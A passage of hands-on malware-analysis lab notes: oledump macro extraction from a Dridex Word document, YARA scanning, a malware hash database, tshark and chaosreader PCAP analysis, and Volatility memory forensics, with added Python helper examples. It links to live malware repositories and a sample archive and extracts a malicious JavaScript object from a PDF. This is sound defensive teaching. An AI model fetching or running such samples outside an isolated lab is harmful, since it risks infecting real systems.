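    (b"PK\x03\x04", "zip"),                            # also .docx/.xlsx/.jar
    (b"\x7fELF", "elf"),
]

# Which content each extension claims to carry.
EXTENSION_CLAIMS = {".exe": "pe", ".dll": "pe", ".pdf": "pdf", ".doc": "ole2", ".zip": "zip"}


def identify(data):
    """Return the type implied by the leading bytes, or 'unknown'."""
    for sig, kind in MAGIC:
        if data.startswith(sig):
            return kind
    return "unknown"


def extension_mismatch(filename, data):
    """True when the name claims one type and the bytes say another (or nothing)."""
    claimed = EXTENSION_CLAIMS.get(os.path.splitext(filename)[1].lower())
    return claimed is not None and identify(data) != claimed


def pe_info(data):
    """Walk MZ -> e_lfanew -> PE signature -> COFF header; None if not laid out as a PE."""
    if len(data) < 0x40 or not data.startswith(b"MZ"):
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]       # offset of the PE header
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # COFF header: Machine, NumberOfSections, TimeDateStamp, ... (little-endian)
    machine, sections = struct.unpack_from("<HH", data, e_lfanew + 4)
    return {"machine": hex(machine), "sections": sections}


def build_minimal_pe(sections=3):
    """Constructed DOS header + COFF header with no code, just enough to parse."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                 # e_lfanew
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, sections, 0, 0, 0, 0xE0, 0x102)
    return bytes(dos) + bytes(0x80 - 0x40) + coff


if __name__ == "__main__":
    sample = build_minimal_pe()
    for name in ("malware.exe", "malware.pdf"):
        print(name, identify(sample), "mismatch" if extension_mismatch(name, sample) else "ok")
    print(pe_info(sample))
```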
  900.  
  901.  
  902.  
  903.  
  904. Building a Malware Scanner
  905. --------------------------
  906.  
  907. mkdir ~/Desktop/malwarescanner
  908.  
  909. cd ~/Desktop/malwarescanner
  910.  
  911. wget https://github.com/jonahbaron/malwarescanner/archive/master.zip
  912.  
  913. unzip master.zip
  914.  
  915. cd malwarescanner-master/
  916.  
  917. python scanner.py -h
  918.  
  919. cat strings.txt
  920.  
  921. cat hashes.txt
  922.  
  923. mkdir ~/Desktop/malcode
  924.  
  925. cp ~/Desktop/malware.exe ~/Desktop/malcode
  926.  
  927. python scanner.py -H hashes.txt -D /home/malware/Desktop/malcode/ strings.txt
  928.  
  929. cp ~/Desktop/
  930.  
  931.  
  932.  
  933. #####################################################
  934. # Analyzing Macro Embedded Malware #
  935. # Reference: #
  936. # https://jon.glass/analyzes-dridex-malware-p1/ #
  937. #####################################################
  939.  
  940. - Create a FREE account on:
  941. https://malwr.com/account/signup/
  942.  
  943. - Grab the malware from:
  944. https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/
  945.  
  946. file ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
  947.  
  948. cat ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
  949.  
  950.  
  951.  
  952.  
  953. sudo pip install olefile
  954.  
  955. mkdir ~/Desktop/oledump
  956.  
  957. cd ~/Desktop/oledump
  958.  
  959. wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
  960.  
  961. unzip oledump_V0_0_22.zip
  962.  
  963. cp ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin .
  964.  
  965. mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc
  966.  
  967. python oledump.py 064016.doc
  968.  
  969. python oledump.py 064016.doc -s A4 -v
  970.  
  971. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
  972. - Three of the data streams are flagged as macros: A3:'VBA/Module1', A4:'VBA/Module2', A5:'VBA/ThisDocument'.
  973.  
  974.  
  975. python oledump.py 064016.doc -s A5 -v
  976.  
  977. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
  978.  
  979.  
  980. python oledump.py 064016.doc -s A3 -v
  981.  
  982. - Look for "GVhkjbjv" and you should see:
  983.  
  985.  
  986. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
  987. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
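Added example (not part of the course or of oledump): an offline replacement for the hex-to-ASCII web form that pulls every long hex literal out of a decompressed VBA stream and decodes it, skipping odd-length runs and runs that do not decode to printable text. The VBA text and its hex value are constructed here and are not the real blob from the 064016.doc macro.

```python
import re

# A hex literal worth decoding: at least 16 hex digits (shorter runs are addresses, colours, noise).
HEX_BLOB = re.compile(r"[0-9A-Fa-f]{16,}")

def decode_hex_blobs(vba_source, min_printable=0.9):
    """Return (hex, decoded) pairs for every hex literal that decodes to mostly printable text."""
    out = []
    for blob in HEX_BLOB.findall(vba_source):
        if len(blob) % 2:          # odd length cannot be whole bytes; skip rather than guess
            continue
        raw = bytes.fromhex(blob)
        printable = sum(32 <= b < 127 for b in raw) / len(raw)
        if printable >= min_printable:
            out.append((blob, raw.decode("ascii", errors="replace")))
    return out

# Constructed stand-in for the decompressed VBA/Module1 stream; the hex is not the real blob.
SAMPLE_VBA = '''
Sub GVhkjbjv()
    Dim s As String
    s = "636D64202F63206563686F2068656C6C6F"
    x = 123456
End Sub
'''

if __name__ == "__main__":
    for blob, text in decode_hex_blobs(SAMPLE_VBA):
        print(blob[:12] + "...", "->", repr(text))
```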
  988.  
  989.  
  990.  
  991.  
  992. ##############
  993. # Yara Ninja #
  994. ##############
  995. sudo apt-get remove -y yara
  996.  
  997. wget https://github.com/plusvic/yara/archive/v3.4.0.zip
  998.  
  999. sudo apt-get -y install libtool
  1000.  
  1001. unzip v3.4.0.zip
  1002.  
  1003. cd yara-3.4.0
  1004.  
  1005. ./bootstrap.sh
  1006.  
  1007. ./configure
  1008.  
  1009. make
  1010.  
  1011. sudo make install
  1012.  
  1013. yara -v
  1014.  
  1015. cd ..
  1016.  
  1017. wget https://github.com/Yara-Rules/rules/archive/master.zip
  1018.  
  1019. unzip master.zip
  1020.  
  1021. cd ~/Desktop
  1022.  
  1023. yara rules-master/packer.yar malcode/malware.exe
  1024.  
  1025.  
  1026. Places to get more Yara rules:
  1027. ------------------------------
  1028. https://malwareconfig.com/static/yaraRules/
  1029. https://github.com/kevthehermit/YaraRules
  1030. https://github.com/VectraThreatLab/reyara
  1031.  
  1032.  
  1033.  
  1034. Yara rule sorting script:
  1035. -------------------------
  1036. https://github.com/mkayoh/yarasorter
  1037.  
  1038.  
  1039.  
  1040. cd ~/Desktop/rules-master
  1041. for i in $( ls --hide=master.yar ); do echo include \"$i\";done > master.yar
  1042. cd ~/Desktop/
  1043. yara rules-master/master.yar malcode/malware.exe
  1044.  
  1045.  
  1046.  
  1047.  
  1048.  
  1049.  
  1050.  
  1051.  
  1052.  
  1053.  
  1054. Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
  1055. http://derekmorton.name/files/malware_12-14-12.sql.bz2
  1056.  
  1057.  
  1058. Malware Repositories:
  1059. http://malshare.com/index.php
  1060. http://www.malwareblacklist.com/
  1061. http://www.virusign.com/
  1062. http://virusshare.com/
  1063. http://www.tekdefense.com/downloads/malware-samples/
  1064.  
  1065.  
  1066.  
  1067.  
  1068. ###############################
  1069. # Creating a Malware Database #
  1070. ###############################
  1071.  
  1072. Creating a malware database (sqlite)
  1073. ------------------------------------
  1074. sudo apt-get install -y python-simplejson python-simplejson-dbg
  1075. wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
  1076. wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
  1077. unzip malware-password-is-infected.zip
  1078. infected
  1079. python avsubmit.py --init
  1080. python avsubmit.py -f malware.exe -e
  1081.  
  1082.  
  1083.  
  1084.  
  1085.  
  1086. Creating a malware database (mysql)
  1087. -----------------------------------
  1088. - Step 1: Installing MySQL database
  1089. - Run the following command in the terminal:
  1090.  
  1091. sudo apt-get install mysql-server
  1092.  
  1093. - Step 2: Installing Python MySQLdb module
  1094. - Run the following command in the terminal:
  1095.  
  1096. sudo apt-get build-dep python-mysqldb
  1097. sudo apt-get install python-mysqldb
  1098.  
  1099. - Step 3: Logging in
  1100. - Run the following command in the terminal:
  1101.  
  1102. mysql -u root -p (set a password of 'malware')
  1103.  
  1104. - Then create one database by running following command:
  1105.  
  1106. create database malware;
  1107.  
  1108. exit;
  1109.  
  1110. wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
  1111.  
  1112. vi mal_to_db.py (fill in database connection information)
  1113.  
  1114. python mal_to_db.py -i
  1115.  
  1116. python mal_to_db.py -f malware.exe -u
  1117.  
  1118.  
  1119. mysql -u root -p
  1120. malware
  1121.  
  1122. mysql> use malware;
  1123.  
  1124. mysql> select id,md5,sha1,sha256,time FROM files;
  1125.  
  1126. mysql> quit;
  1127.  
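Added example covering both the sqlite and the MySQL walkthroughs above; it is not avsubmit.py or mal_to_db.py, but a self-contained Python/sqlite3 version of what they do: create a files table with the id, md5, sha1, sha256 and time columns the final query selects, insert a sample, and refuse to store the same sample twice. The sample bytes are constructed.

```python
import hashlib
import sqlite3
import time

SCHEMA = """
CREATE TABLE IF NOT EXISTS files (
    id     INTEGER PRIMARY KEY AUTOINCREMENT,
    md5    TEXT NOT NULL,
    sha1   TEXT NOT NULL,
    sha256 TEXT NOT NULL UNIQUE,   -- one row per distinct sample
    size   INTEGER NOT NULL,
    time   TEXT NOT NULL
)"""

def init_db(path=":memory:"):
    """Counterpart of `avsubmit.py --init` / `mal_to_db.py -i`: create the schema."""
    db = sqlite3.connect(path)
    db.execute(SCHEMA)
    return db

def hash_sample(data):
    """md5/sha1/sha256 of the sample bytes, the columns both scripts store."""
    return {name: hashlib.new(name, data).hexdigest() for name in ("md5", "sha1", "sha256")}

def add_sample(db, data, when=None):
    """Insert one sample. Returns (row id, inserted?); a resubmitted file is reported, not duplicated."""
    h = hash_sample(data)
    row = db.execute("SELECT id FROM files WHERE sha256 = ?", (h["sha256"],)).fetchone()
    if row:
        return row[0], False
    cur = db.execute(
        "INSERT INTO files (md5, sha1, sha256, size, time) VALUES (?, ?, ?, ?, ?)",
        (h["md5"], h["sha1"], h["sha256"], len(data), when or time.strftime("%Y-%m-%d %H:%M:%S")))
    db.commit()
    return cur.lastrowid, True

def list_samples(db):
    """The same query the MySQL section runs: select id,md5,sha1,sha256,time FROM files."""
    return db.execute("SELECT id, md5, sha1, sha256, time FROM files ORDER BY id").fetchall()

if __name__ == "__main__":
    db = init_db()                       # in-memory; pass a path to persist it
    # constructed stand-ins for malware.exe (an MZ prefix so they resemble PE files)
    for blob in (b"MZ" + b"\0" * 62 + b"sample one", b"MZ" + b"\0" * 62 + b"sample two"):
        print(add_sample(db, blob))
    for row in list_samples(db):
        print(row)
```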
  1128.  
  1129.  
  1130.  
  1131.  
  1132. #################
  1133. # PCAP Analysis #
  1134. #################
  1135. cd /home/malware/Desktop/Browser\ Forensics
  1136.  
  1137. ls | grep pcap
  1138.  
  1139. perl chaosreader.pl suspicious-time.pcap
  1140.  
  1141. firefox index.html
  1142.  
  1143. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
  1144.  
  1145. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
  1146.  
  1147. sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
  1148.  
  1149.  
  1150. for i in session_00[0-9]*.www.html; do srcip=`cat "$i" | grep 'www:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'www:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
  1151.  
  1152.  
  1153.  
  1154.  
  1155.  
  1156. #############################
  1157. # PCAP Analysis with tshark #
  1158. #############################
  1159. tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
  1160.  
  1161.  
  1162. tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
  1163.  
  1164.  
  1165. tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'
  1166.  
  1167.  
  1168. tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq
  1169.  
  1170.  
  1171. tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq
  1172.  
  1173. tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort |uniq
  1174.  
  1175. tshark -r suspicious-time.pcap -qz ip_hosts,tree
  1176.  
  1177. tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
  1178.  
  1179. tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
  1180.  
  1181.  
  1182. whois rapidshare.com.eyu32.ru
  1183.  
  1184. whois sploitme.com.cn
  1185.  
  1186.  
  1187. tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
  1188.  
  1189. tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
  1190.  
  1191. tshark -r suspicious-time.pcap -qz http_req,tree
  1192.  
  1193. tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
  1194.  
  1195. tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
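Added example serving the two PCAP sections above; it is not chaosreader or tshark, but a minimal pure-Python reader that walks a classic pcap, peels Ethernet/IPv4/UDP, and reports (ip.src, dns.flags.response, dns.qry.name) the way the `tshark -R "dns" -T fields ...` line does. The one-packet pcap is constructed in code; 10.0.3.15 and sploitme.com.cn are taken from the walkthrough, the other addresses are made up.

```python
import socket
import struct

def parse_pcap(data):
    """Yield raw frames from a classic (non-pcapng) pcap, honouring the file's byte order."""
    endian = "<" if data[:4] == b"\xd4\xc3\xb2\xa1" else ">"
    if struct.unpack_from(endian + "I", data, 0)[0] != 0xA1B2C3D4:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    off = 24                                   # 24-byte global header
    while off + 16 <= len(data):               # 16-byte record header, then incl_len bytes of frame
        incl_len = struct.unpack_from(endian + "IIII", data, off)[2]
        yield data[off + 16:off + 16 + incl_len]
        off += 16 + incl_len

def dns_name(pkt, off):
    labels = []
    while pkt[off]:                            # length-prefixed labels; a query name has no compression pointers
        labels.append(pkt[off + 1:off + 1 + pkt[off]].decode("ascii", "replace"))
        off += 1 + pkt[off]
    return ".".join(labels)

def dns_queries(pcap_bytes):
    """Rows of (ip.src, dns.flags.response, dns.qry.name), like the tshark -T fields line above."""
    rows = []
    for frame in parse_pcap(pcap_bytes):
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # Ethernet II carrying IPv4 only
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ip[9] != 17:                                      # UDP only
            continue
        sport, dport = struct.unpack_from("!HH", ip, ihl)
        if 53 not in (sport, dport):
            continue
        dns = ip[ihl + 8:]
        flags, qdcount = struct.unpack_from("!HH", dns, 2)
        if qdcount:
            rows.append((socket.inet_ntoa(ip[12:16]), int(bool(flags & 0x8000)), dns_name(dns, 12)))
    return rows

def build_sample_pcap():
    """Constructed one-packet pcap: 10.0.3.15 asks 10.0.2.2 for sploitme.com.cn (a name from the capture)."""
    qname = b"".join(bytes([len(l)]) + l for l in b"sploitme.com.cn".split(b".")) + b"\0"
    dns = struct.pack("!HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", 1, 1)
    udp = struct.pack("!HHHH", 40000, 53, 8 + len(dns), 0) + dns
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0, socket.inet_aton("10.0.3.15"), socket.inet_aton("10.0.2.2")) + udp
    frame = b"\xaa" * 6 + b"\xbb" * 6 + b"\x08\x00" + ip
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)   # linktype 1 = Ethernet
    return header + struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame
```

Run `dns_queries(open("suspicious-time.pcap", "rb").read())` on the real capture to compare against the tshark output; a pcapng file is rejected rather than misread.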
  1196.  
  1197.  
  1198.  
  1199. ######################################
  1200. # PCAP Analysis with forensicPCAP.py #
  1201. ######################################
  1202. cd ~/Desktop
  1203. wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
  1204. sudo easy_install cmd2
  1205.  
  1206. python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap
  1207.  
  1208. ForPCAP >>> help
  1209.  
  1210.  
  1211. Prints stats about PCAP
  1212. ForPCAP >>> stat
  1213.  
  1214.  
  1215. Prints all DNS requests from the PCAP file. The id before the DNS entry is the packet's id, which can be used with the "show" command.
  1216. ForPCAP >>> dns
  1217.  
  1218. ForPCAP >>> show
  1219.  
  1220.  
  1221. Prints all destination ports from the PCAP file. The id before each entry is the packet's id, which can be used with the "show" command.
  1222. ForPCAP >>> dstports
  1223.  
  1224. ForPCAP >>> show
  1225.  
  1226.  
  1227. Prints the number of source IPs and stores them.
  1228. ForPCAP >>> ipsrc
  1229.  
  1230.  
  1231. Prints the number of web requests and stores them.
  1232. ForPCAP >>> web
  1233.  
  1234.  
  1235. Prints the number of mail requests and stores them.
  1236. ForPCAP >>> mail
  1237.  
  1238.  
  1239.  
  1240. ###################
  1241. # Memory Analysis #
  1242. ###################
  1243. cd /home/malware/Desktop/Banking\ Troubles/Volatility
  1244.  
  1245. python volatility
  1246. python volatility pslist -f ../hn_forensics.vmem
  1247. python volatility connscan2 -f ../hn_forensics.vmem
  1248. python volatility memdmp -p 888 -f ../hn_forensics.vmem
  1249. python volatility memdmp -p 1752 -f ../hn_forensics.vmem
  1250. ***Takes a few min***
  1251. strings 1752.dmp | grep "^http://" | sort | uniq
  1252. strings 1752.dmp | grep "Ahttps://" | uniq -u
  1253. cd ..
  1254. foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
  1255. cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
  1256. cat audit.txt
  1257. cd pdf
  1258. ls
  1259. grep -i javascript *.pdf
  1260.  
  1261.  
  1262.  
  1263. cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
  1264. wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
  1265. unzip pdf-parser_V0_6_4.zip
  1266. python pdf-parser.py -s javascript --raw 00600328.pdf
  1267. python pdf-parser.py --object 11 00600328.pdf
  1268. python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js
  1269.  
  1270. cat malicious.js
  1271.  
  1272.  
  1273. *****Sorry - no time to cover javascript de-obfuscation today*****
  1274.  
  1275.  
  1276. cd /home/malware/Desktop/Banking\ Troubles/Volatility/
  1277. python volatility files -f ../hn_forensics.vmem > files
  1278. cat files | less
  1279. python volatility malfind -f ../hn_forensics.vmem -d out
  1280. ls out/
  1281. python volatility hivescan -f ../hn_forensics.vmem
  1282. python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
  1283. for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done